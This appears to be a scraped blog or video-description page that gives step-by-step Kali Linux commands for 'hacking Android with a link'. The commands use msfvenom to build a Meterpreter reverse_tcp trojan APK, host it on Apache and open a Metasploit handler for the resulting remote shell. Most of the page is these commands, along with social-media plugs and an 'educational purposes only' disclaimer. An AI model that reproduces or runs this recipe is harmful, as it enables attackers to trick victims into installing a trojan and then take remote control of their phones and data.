How to hack Android with a link using Kali Linux 2018.1

J0oaKIQnrZs/default.jpg

How to hack Android with a link using Kali Linux 2018.1
!!! ONLY FOR EDUCATIONAL PURPOSES !!!
commands
-msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.68 lport=4444 r (angle bracket)/var/www/html/trojan.apk
-service apache2 start
-msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost your_ip
set lport 4444
exploit
...
THANK YOU FOR WATCHING
SUBSCRIBE
SHARE
LIKE
FOLLOW US ON INSTAGRAM
https://www.instagram.com/kali_linux_...
FOLLOW US ON TWITTER
https://twitter.com/KALILINUXTRICKS

J0oaKIQnrZs/default.jpg
How to hack Android with a link using Kali Linux 2018.1 How to hack Android with a link using Kali Linux 2018.1 Reviewed by Anonymous on March 30, 2018 Rating: 5